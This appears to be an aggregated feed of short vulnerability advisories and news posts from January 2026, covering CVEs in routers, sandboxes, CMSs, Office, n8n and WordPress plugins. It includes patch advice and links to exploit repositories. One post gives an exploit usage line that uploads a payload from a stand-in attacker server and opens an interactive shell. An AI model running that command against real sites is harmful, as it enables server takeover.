Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) contain an authorization flaw in the user management API that allows a low-privileged authenticated user to change the administrator account password. By sending a craf...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24428/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24428 - High (8.8)
Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) contain an authorization flaw in the user management API that allows a low-privileged authenticated user to change the administrator account password. By sending a craf...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24428/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T13:01:22.300000
2 posts
🔴 CVE-2026-24429 - Critical (9.8)
Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) ship with a predefined default password for a built-in authentication account that is not required to be changed during initial configuration. An attacker can leverage ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24429/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-24429 - Critical (9.8)
Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) ship with a predefined default password for a built-in authentication account that is not required to be changed during initial configuration. An attacker can leverage ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24429/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T03:43:44
1 posts
🔴 CVE-2026-23830 - Critical (10)
SandboxJS is a JavaScript sandboxing library. Versions prior to 0.8.26 have a sandbox escape vulnerability due to `AsyncFunction` not being isolated in `SandboxFunction`. The library attempts to sandbox code execution by replacing the global `Func...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23830/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T03:43:28
2 posts
🟠 CVE-2026-24765 - High (7.8)
PHPUnit is a testing framework for PHP. A vulnerability has been discovered in versions prior to 12.5.8, 11.5.50, 10.5.62, 9.6.33, and 8.5.52 involving unsafe deserialization of code coverage data in PHPT test execution. The vulnerability exists i...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24765/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##RE: https://phpc.social/@sebastian/115965753874226093
This is CVE-2026-24765 now.
##updated 2026-01-29T03:42:53
1 posts
🟠 CVE-2026-24747 - High (8.8)
PyTorch is a Python package that provides tensor computation. Prior to version 2.10.0, a vulnerability in PyTorch's `weights_only` unpickler allows an attacker to craft a malicious checkpoint file (`.pth`) that, when loaded with `torch.load(..., w...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24747/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T03:31:32
1 posts
🔴 CVE-2026-22039 - Critical (9.9)
Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have a critical authorization boundary bypass in namespaced Kyverno Policy apiCall. The resolved `urlPath` is executed using the K...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22039/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T21:34:04
2 posts
🔴 CVE-2026-24838 - Critical (9.1)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, module title supports richtext which could include scripts that would execute in certain scenarios...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24838/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-24838 - Critical (9.1)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, module title supports richtext which could include scripts that would execute in certain scenarios...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24838/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T21:31:21
2 posts
🔴 CVE-2025-57792 - Critical (10)
Explorance Blue versions prior to 8.14.9 contain a SQL injection vulnerability caused by insufficient validation of user input in a web application endpoint. An attacker can supply crafted input that is executed as part of backend database queries...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-57792/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-57792 - Critical (10)
Explorance Blue versions prior to 8.14.9 contain a SQL injection vulnerability caused by insufficient validation of user input in a web application endpoint. An attacker can supply crafted input that is executed as part of backend database queries...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-57792/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T21:31:21
2 posts
🟠 CVE-2025-57793 - High (8.6)
Explorance Blue versions prior to 8.14.9 contain a SQL injection vulnerability caused by insufficient validation of user-supplied input in a web application component. Crafted input can be executed as part of backend database queries. The issue is...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-57793/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-57793 - High (8.6)
Explorance Blue versions prior to 8.14.9 contain a SQL injection vulnerability caused by insufficient validation of user-supplied input in a web application component. Crafted input can be executed as part of backend database queries. The issue is...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-57793/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T20:16:51.880000
1 posts
🟠 CVE-2026-24430 - High (7.5)
Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) disclose sensitive account credentials in cleartext within HTTP responses generated by the maintenance interface. Because the management interface is accessible over un...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24430/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T19:57:17.200000
1 posts
🔴 CVE-2026-24436 - Critical (9.8)
Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) do not enforce rate limiting or account lockout mechanisms on authentication endpoints. This allows attackers to perform unrestricted brute-force attempts against admin...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24436/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T19:20:05.660000
1 posts
🟠 CVE-2026-24440 - High (8.8)
Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) allow account passwords to be changed through the maintenance interface without requiring verification of the existing password. This enables unauthorized password chan...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24440/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T16:34:17
1 posts
🟠 CVE-2026-24837 - High (7.6)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, a module friendly name could include scripts that will run during som...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24837/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T15:59:06.483000
1 posts
🟠 CVE-2026-24477 - High (7.5)
AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. If AnythingLLM prior to version 1.10.0 is configured to use Qdrant as the vector database with an API key, this QdrantApiKe...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24477/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T15:31:30
2 posts
🟠 CVE-2026-21569 - High (7.9)
This High severity XXE (XML External Entity Injection) vulnerability was introduced in version 7.1.0 of Crowd Data Center and Server.
This XXE (XML External Entity Injection) vulnerability, with a CVSS Score of 7.9, allows an authenticated att...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21569/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21569 - High (7.9)
This High severity XXE (XML External Entity Injection) vulnerability was introduced in version 7.1.0 of Crowd Data Center and Server.
This XXE (XML External Entity Injection) vulnerability, with a CVSS Score of 7.9, allows an authenticated att...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21569/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T12:30:36
1 posts
🟠 CVE-2026-0844 - High (8.8)
The Simple User Registration plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 6.7 due to insufficient restriction on the 'profile_save_field' function. This makes it possible for authenticated attackers,...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0844/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T12:30:35
1 posts
🟠 CVE-2025-14386 - High (8.8)
The Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing & Integrated AI Optimization plugin for WordPress is vulnerable to authentication bypass due to a missing capability check on the 'generate_sso_url' and 'validate_sso_token' f...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-14386/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-28T09:30:35
1 posts
🟠 CVE-2026-0702 - High (7.5)
The VidShop – Shoppable Videos for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the 'fields' parameter in all versions up to, and including, 1.1.4 due to insufficient escaping on the user supplied parameter and ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0702/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T21:32:51
1 posts
🟠 CVE-2025-59106 - High (8.8)
The binary serving the web server and executing basically all actions launched from the Web UI is running with root privileges. This is against the least privilege principle. If an attacker is able to execute code on the system via other vulnerabi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-59106/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T21:31:56
2 posts
🔴 CVE-2025-21589 - Critical (9.8)
An Authentication Bypass Using an
Alternate Path or Channel vulnerability in Juniper Networks Session Smart
Router may allows a network-based attacker to bypass authentication
and take administrative control of the device.
This issue affects Sess...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-21589/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-21589 - Critical (9.8)
An Authentication Bypass Using an
Alternate Path or Channel vulnerability in Juniper Networks Session Smart
Router may allows a network-based attacker to bypass authentication
and take administrative control of the device.
This issue affects Sess...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-21589/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T21:31:49
1 posts
🟠 CVE-2026-24881 - High (8.1)
In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an oversized wrapped session key can cause a stack-based buffer overflow in gpg-agent during PKDECRYPT--kem=CMS handling. This can easily be leveraged for denial of serv...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24881/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T18:32:29
2 posts
New advisory.
High severity NVIDIA runx vulnerability: CVE-2025-33234 https://nvidia.custhelp.com/app/answers/detail/a_id/5764 #Nvidia #vulnerability #infosec
##🟠 CVE-2025-33234 - High (7.8)
NVIDIA runx contains a vulnerability where an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-33234/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T18:32:28
1 posts
🟠 CVE-2026-24875 - High (7.8)
Integer Overflow or Wraparound vulnerability in yoyofr modizer.This issue affects modizer: before 4.1.1.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24875/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T18:32:24
1 posts
🟠 CVE-2026-24869 - High (8.1)
Use-after-free in the Layout: Scrolling and Overflow component. This vulnerability affects Firefox < 147.0.2.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24869/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T16:19:42.330000
10 posts
3 repos
https://github.com/ksk-itdk/KSK-ITDK-CVE-2026-21509-Mitigation
⚪ Microsoft rushes to fix Office 0-day vulnerability actively exploited by hackers
🗨️ Microsoft developers have released out-of-band patches for a critical Office vulnerability that is already being actively exploited in attacks. The issue affects almost all versions of the product—from Office 2016 to Microsoft 365 Apps for Enterprise.
##Here's a summary of recent important global, technology, and cybersecurity news:
Global: India has contained a Nipah virus outbreak (Jan 28, 2026). The EU approved a ban on Russian gas imports, effective from 2027 (Jan 27, 2026).
Technology: The EU is pressing Google to share AI and search data under new regulations (Jan 27, 2026). Samsung is nearing Nvidia approval for advanced HBM4 AI memory chips (Jan 27, 2026). Fujitsu developed AI for space weather prediction (Jan 28, 2026).
Cybersecurity: Microsoft issued emergency patches for an actively exploited Office zero-day vulnerability (CVE-2026-21509) (Jan 27, 2026). Fortinet patched a critical FortiOS SSO authentication bypass (CVE-2026-24858) under active exploitation (Jan 28, 2026). AI-powered polymorphic phishing attacks are also a growing concern (Jan 28, 2026).
##[VULN] ⚠️"Une faille de Microsoft Office est activement exploitée par des pirates "
(NdR : cybercriminels et/ou opérateurs malveillants agissant pour le compte d’une entité soutenant les intérêts géopolitiques d’un État)
"Microsoft alerte sur une nouvelle faille critique dans Office. Déjà exploitée par des cybercriminels, la vulnérabilité permet de désactiver la sécurité mise en place par Microsoft. L’éditeur a commencé à déployer d’urgence un correctif pour Microsoft 365 et les versions récentes d’Office.
…
Pour protéger les internautes contre les attaques en cours, Microsoft a déployé une mise à jour qui « corrige la vulnérabilité qui contourne les mesures d’atténuation » d’Office. Les utilisateurs de Microsoft 365 et Microsoft Office sont invités à installer le correctif sans tarder.
Les utilisateurs d’Office 2021 et des versions ultérieures « seront automatiquement protégés grâce à une modification côté serveur, mais devront redémarrer leurs applications Office pour que cette modification prenne effet ». Il n’y a donc rien à faire, sauf redémarrer vos applications. Enfin, Microsoft n’a pas encore corrigé le tir sur Office 2016 et 2019. En attendant un correctif, Microsoft propose des mesures d’atténuation à ses utilisateurs."
👇
https://www.01net.com/actualites/faille-microsoft-office-activement-exploitee-pirates.html
🔬
⬇️
https://vulnerability.circl.lu/vuln/CVE-2026-21509
📜
⬇️
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509
Microsoft Office Zero-Day (CVE-2026-21509) - Emergency Patch Issued for Active Exploitation https://thehackernews.com/2026/01/microsoft-issues-emergency-patch-for.html
##The vulnerability, tracked as CVE-2026-21509, carries a CVSS score of 7.8 out of 10.0. It has been described as a security feature bypass in Microsoft Office. https://thehackernews.com/2026/01/microsoft-issues-emergency-patch-for.html
##Microsoft Office Zero-Day (CVE-2026-21509) - Emergency Patch Issued for Active Exploitation
https://thehackernews.com/2026/01/microsoft-issues-emergency-patch-for.html
##Microsoft a patché en urgence une faille de sécurité zero-day dans Office : CVE-2026-21509 https://www.it-connect.fr/microsoft-office-faille-zero-day-cve-2026-21509/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #Microsoft #Office
##Microsoft Issues Emergency Patch for Actively Exploited Office Zero-Day
Microsoft released emergency updates for an actively exploited Office zero-day (CVE-2026-21509) that allows attackers to bypass OLE security protections when a user opens a malicious file.
**For everyone using Microsoft Office, this is important and urgent. Hackers attack with malicious MS Office documents. Restart all Microsoft 365 and Office 2021 applications immediately to trigger the service-side security fix. For older versions like Office 2016, apply registry workarounds until Microsoft releases a formal patch.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/microsoft-issues-emergency-patch-for-actively-exploited-office-zero-day-v-8-i-f-4/gD2P6Ple2L
„In Office 2016 bis Office 2024 (auch LTSC), sowie die Microsoft 365 Apps für Unternehmen steckt eine Sicherheitslücke, die aktiv ausgenutzt wird.“
##updated 2026-01-27T16:06:45.160000
5 posts
1 repos
Critical n8n Sandbox Escapes Enable Remote Code Execution
n8n reports two sandbox escape vulnerabilities, CVE-2026-1470 and CVE-2026-0863, that allow authenticated users to execute arbitrary code and take over self-hosted servers. These flaws bypass JavaScript and Python security filters by exploiting deprecated language features and specific interpreter behaviors.
**If you are using n8n, make sure it's isolated from the internet and accessible from trusted users only. Then patch n8n to version 1.123.17, 2.4.5 for CVE-2026-1470, and 1.123.14, 2.3.5 for CVE-2026-0863 or later. The CVE-2026-1470 patch is higher priority. Also configure Python nodes to run in 'External' mode for better process isolation.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-n8n-sandbox-escapes-enable-remote-code-execution-7-0-w-q-b/gD2P6Ple2L
n8n – CVE-2026-1470 et CVE-2026-0863 : deux nouvelles failles patchées, comment se protéger ? https://www.it-connect.fr/n8n-cve-2026-1470-et-cve-2026-0863-patchs-de-securite/ #ActuCybersécurité #Cybersécurité #Vulnérabilité
##Critical n8n Sandbox Escapes Enable Remote Code Execution
n8n reports two sandbox escape vulnerabilities, CVE-2026-1470 and CVE-2026-0863, that allow authenticated users to execute arbitrary code and take over self-hosted servers. These flaws bypass JavaScript and Python security filters by exploiting deprecated language features and specific interpreter behaviors.
**If you are using n8n, make sure it's isolated from the internet and accessible from trusted users only. Then patch n8n to version 1.123.17, 2.4.5 for CVE-2026-1470, and 1.123.14, 2.3.5 for CVE-2026-0863 or later. The CVE-2026-1470 patch is higher priority. Also configure Python nodes to run in 'External' mode for better process isolation.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-n8n-sandbox-escapes-enable-remote-code-execution-7-0-w-q-b/gD2P6Ple2L
n8n – CVE-2026-1470 et CVE-2026-0863 : deux nouvelles failles patchées, comment se protéger ? https://www.it-connect.fr/n8n-cve-2026-1470-et-cve-2026-0863-patchs-de-securite/ #ActuCybersécurité #Cybersécurité #Vulnérabilité
##🔴 CVE-2026-1470 - Critical (9.9)
n8n contains a critical Remote Code Execution (RCE) vulnerability in its workflow Expression evaluation system. Expressions supplied by authenticated users during workflow configuration may be evaluated in an execution context that is not sufficie...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1470/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T15:28:07.247000
1 posts
11 repos
https://github.com/yt2w/CVE-2025-52691
https://github.com/nxgn-kd01/smartermail-cve-scanner
https://github.com/rxerium/CVE-2025-52691
https://github.com/Ashwesker/Ashwesker-CVE-2025-52691
https://github.com/rimbadirgantara/CVE-2025-52691-poc
https://github.com/hilwa24/CVE-2025-52691
https://github.com/SuJing-cy/CVE-2025-2025-52691-SmarterMail-Exp
https://github.com/you-ssef9/CVE-2025-52691
https://github.com/watchtowrlabs/watchTowr-vs-SmarterMail-CVE-2025-52691
❗️CVE-2025-52691: SmarterMail Authentication Bypass and RCE PoC
https://darkwebinformer.com/cve-2025-52691-smartermail-authentication-bypass-and-rce-poc/
##updated 2026-01-27T15:15:57.583000
1 posts
🟠 CVE-2026-21720 - High (7.5)
Every uncached /avatar/:hash request spawns a goroutine that refreshes the Gravatar image. If the refresh sits in the 10-slot worker queue longer than three seconds, the handler times out and stops listening for the result, so that goroutine block...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21720/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T14:59:34.073000
2 posts
New.
AhnLab: React Server Component Security Update Advisory (CVE-2026-23864) https://asec.ahnlab.com/en/92377/ #vulnerability #infosec
##New.
AhnLab: React Server Component Security Update Advisory (CVE-2026-23864) https://asec.ahnlab.com/en/92377/ #vulnerability #infosec
##updated 2026-01-27T14:59:34.073000
2 posts
Critical Sandbox Escape in vm2 Library Allows Remote Code Execution
A critical sandbox escape vulnerability in the vm2 Node.js library (CVE-2026-22709) allows attackers to bypass Promise sanitization and execute arbitrary system commands on the host server.
**If you're using the vm2 library for Node.js, immediately update to version 3.10.3 to fix CVE-2026-22709 - version 3.10.1 is NOT safe. If you can't update right away, stop running any untrusted code through vm2 or switch to stronger isolation methods like containers.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-sandbox-escape-in-vm2-library-allows-remote-code-execution-k-0-8-e-l/gD2P6Ple2L
Critical sandbox escape flaw discovered in popular vm2 NodeJS library
A critical-severity vulnerability in the vm2 Node.js sandbox library, tracked as CVE-2026-22709, allows escaping the sandbox and executing...
🔗️ [Bleepingcomputer] https://link.is.it/hbFnIL
##updated 2026-01-27T14:59:34.073000
1 posts
🟠 CVE-2025-41727 - High (7.8)
A local low privileged attacker can bypass the authentication of the Device Manager user interface, allowing them to perform privileged operations and gain administrator access.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-41727/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T14:59:34.073000
1 posts
🟠 CVE-2025-41726 - High (8.8)
A low privileged remote attacker can execute arbitrary code by sending specially crafted calls to the web service of the Device Manager or locally via an API and can cause integer overflows which then may lead to arbitrary code execution within pr...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-41726/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T14:59:34.073000
1 posts
🟠 CVE-2026-24828 - High (7.5)
Missing Release of Memory after Effective Lifetime vulnerability in Is-Daouda is-Engine.This issue affects is-Engine: before 3.3.4.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24828/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T12:31:24
1 posts
🟠 CVE-2026-24827 - High (7.5)
Out-of-bounds Write vulnerability in gerstrong Commander-Genius.This issue affects Commander-Genius: before Release refs/pull/358/merge.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24827/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T12:31:24
1 posts
🔴 CVE-2026-24830 - Critical (9.8)
Integer Overflow or Wraparound vulnerability in Ralim IronOS.This issue affects IronOS: before v2.23-rc2.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24830/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T09:30:36
1 posts
🟠 CVE-2026-21721 - High (8.1)
The dashboard permissions API does not verify the target dashboard scope and only checks the dashboards.permissions:* action. As a result, a user who has permission management rights on one dashboard can read and modify permissions on other dashbo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21721/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T23:16:10.593000
1 posts
🟠 CVE-2026-24536 - High (7.5)
Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in webpushr Webpushr webpushr-web-push-notifications allows Retrieve Embedded Sensitive Data.This issue affects Webpushr: from n/a through <= 4.38.0.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24536/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T23:16:09.643000
1 posts
🟠 CVE-2026-24524 - High (8.1)
Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tablesome: from n/a through <= 1.1.35.2.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24524/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T23:16:09.460000
1 posts
🟠 CVE-2026-24523 - High (7.5)
Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Marcus (aka @msykes) WP FullCalendar wp-fullcalendar allows Retrieve Embedded Sensitive Data.This issue affects WP FullCalendar: from n/a through <= 1.6.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24523/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T21:30:35
1 posts
🟠 CVE-2026-24538 - High (7.6)
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in omnipressteam Omnipress omnipress allows PHP Local File Inclusion.This issue affects Omnipress: from n/a through <= 1.6.6.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24538/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:05:39.840000
4 posts
Critical n8n Sandbox Escapes Enable Remote Code Execution
n8n reports two sandbox escape vulnerabilities, CVE-2026-1470 and CVE-2026-0863, that allow authenticated users to execute arbitrary code and take over self-hosted servers. These flaws bypass JavaScript and Python security filters by exploiting deprecated language features and specific interpreter behaviors.
**If you are using n8n, make sure it's isolated from the internet and accessible from trusted users only. Then patch n8n to version 1.123.17, 2.4.5 for CVE-2026-1470, and 1.123.14, 2.3.5 for CVE-2026-0863 or later. The CVE-2026-1470 patch is higher priority. Also configure Python nodes to run in 'External' mode for better process isolation.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-n8n-sandbox-escapes-enable-remote-code-execution-7-0-w-q-b/gD2P6Ple2L
n8n – CVE-2026-1470 et CVE-2026-0863 : deux nouvelles failles patchées, comment se protéger ? https://www.it-connect.fr/n8n-cve-2026-1470-et-cve-2026-0863-patchs-de-securite/ #ActuCybersécurité #Cybersécurité #Vulnérabilité
##Critical n8n Sandbox Escapes Enable Remote Code Execution
n8n reports two sandbox escape vulnerabilities, CVE-2026-1470 and CVE-2026-0863, that allow authenticated users to execute arbitrary code and take over self-hosted servers. These flaws bypass JavaScript and Python security filters by exploiting deprecated language features and specific interpreter behaviors.
**If you are using n8n, make sure it's isolated from the internet and accessible from trusted users only. Then patch n8n to version 1.123.17, 2.4.5 for CVE-2026-1470, and 1.123.14, 2.3.5 for CVE-2026-0863 or later. The CVE-2026-1470 patch is higher priority. Also configure Python nodes to run in 'External' mode for better process isolation.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-n8n-sandbox-escapes-enable-remote-code-execution-7-0-w-q-b/gD2P6Ple2L
n8n – CVE-2026-1470 et CVE-2026-0863 : deux nouvelles failles patchées, comment se protéger ? https://www.it-connect.fr/n8n-cve-2026-1470-et-cve-2026-0863-patchs-de-securite/ #ActuCybersécurité #Cybersécurité #Vulnérabilité
##updated 2026-01-26T15:04:59.737000
2 posts
3 repos
https://github.com/O99099O/By-Poloss..-..CVE-2026-0920
https://github.com/John-doe-code-a11/CVE-2026-0920
https://github.com/Galaxy-sc/CVE-2026-0920-WordPress-LA-Studio-Exploit
‼️ CVE-2026-0920: Explanation and payload of the recent vulnerability in the LA-Studio Element WordPress plugin.
PoC/Exploit: https://github.com/John-doe-code-a11/CVE-2026-0920
CVSS: 9.8
CVE Published: January 22nd, 2026
Advisory: https://github.com/advisories/GHSA-m3h4-65j5-6j8c
Technical Analysis: https://www.wordfence.com/blog/2026/01/20000-wordpress-sites-affected-by-backdoor-vulnerability-in-la-studio-element-kit-for-elementor-wordpress-plugin/
##‼️ CVE-2026-0920: Explanation and payload of the recent vulnerability in the LA-Studio Element WordPress plugin.
PoC/Exploit: https://github.com/John-doe-code-a11/CVE-2026-0920
CVSS: 9.8
CVE Published: January 22nd, 2026
Advisory: https://github.com/advisories/GHSA-m3h4-65j5-6j8c
Technical Analysis: https://www.wordfence.com/blog/2026/01/20000-wordpress-sites-affected-by-backdoor-vulnerability-in-la-studio-element-kit-for-elementor-wordpress-plugin/
##updated 2026-01-26T15:04:59.737000
1 posts
Critical Cellbreak Vulnerability in Grist-Core Enables Remote Code Execution
Grist-Core patched a critical vulnerability (CVE-2026-24002) that allows attackers to execute remote code via malicious spreadsheet formulas. The flaw enables unauthorized access to host systems, database credentials, and sensitive internal files.
**If you're running Grist-Core, immediately update to version 1.7.9 to fix this flaw. There's a PoC available, so exploits will start VERY SOON. If you can't update right away, change your GRIST_SANDBOX_FLAVOR setting to "gvisor" as an interim protection measure.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-cellbreak-vulnerability-in-grist-core-enables-remote-code-execution-u-x-w-v-x/gD2P6Ple2L
updated 2026-01-26T15:04:14.850000
1 posts
updated 2026-01-26T14:52:05.833000
1 posts
Tracked as CVE-2024-37079 (CVSS score of 9.8), the flaw is described as an out-of-bounds write issue in the Distributed Computing Environment/Remote Procedure Calls (DCERPC) protocol implementation of vCenter Server. https://www.securityweek.com/2024-vmware-flaw-now-in-attackers-crosshairs/
##updated 2026-01-23T18:31:37
2 posts
1 repos
The VulnCheck research team found an unauth RCE vuln in SmarterMail that at least three other researchers discovered independently. VulnCheck canaries are also detecting in-the-wild exploitation of CVE-2026-24423. Lots of sudden attention on this software from researchers and adversaries.
https://www.vulncheck.com/blog/smartermail-connecttohub-rce-cve-2026-24423
##SmarterTools aren't so smart after all.
VulnCheck, from yesterday: Street Smarts: SmarterMail ConnectToHub Unauthenticated RCE (CVE-2026-24423) https://www.vulncheck.com/blog/smartermail-connecttohub-rce-cve-2026-24423 @vulncheck #infosec #threatresearch #vulnerability
##updated 2026-01-23T16:15:51.050000
1 posts
3 repos
https://github.com/RandomRobbieBF/CVE-2024-9932
https://github.com/JoshuaProvoste/0-click-RCE-Exploit-for-CVE-2024-9932
‼️ CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE).
GitHub: https://github.com/JoshuaProvoste/0-click-RCE-Exploit-for-CVE-2024-9932
Type: 0-Click RCE Exploit
Usage: python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php
After execution, the script uploads the payload, confirms its accessibility, detects the OS, and drops into an interactive shell.
##updated 2026-01-21T19:14:17.880000
1 posts
2 repos
‼️ CVE-2026-22794: Appsmith Password Reset Account Takeover via Origin Header Injection
GitHub: https://github.com/MalikHamza7/CVE-2026-22794-POC
CVSS: 9.6
##updated 2025-11-12T16:20:22.257000
2 posts
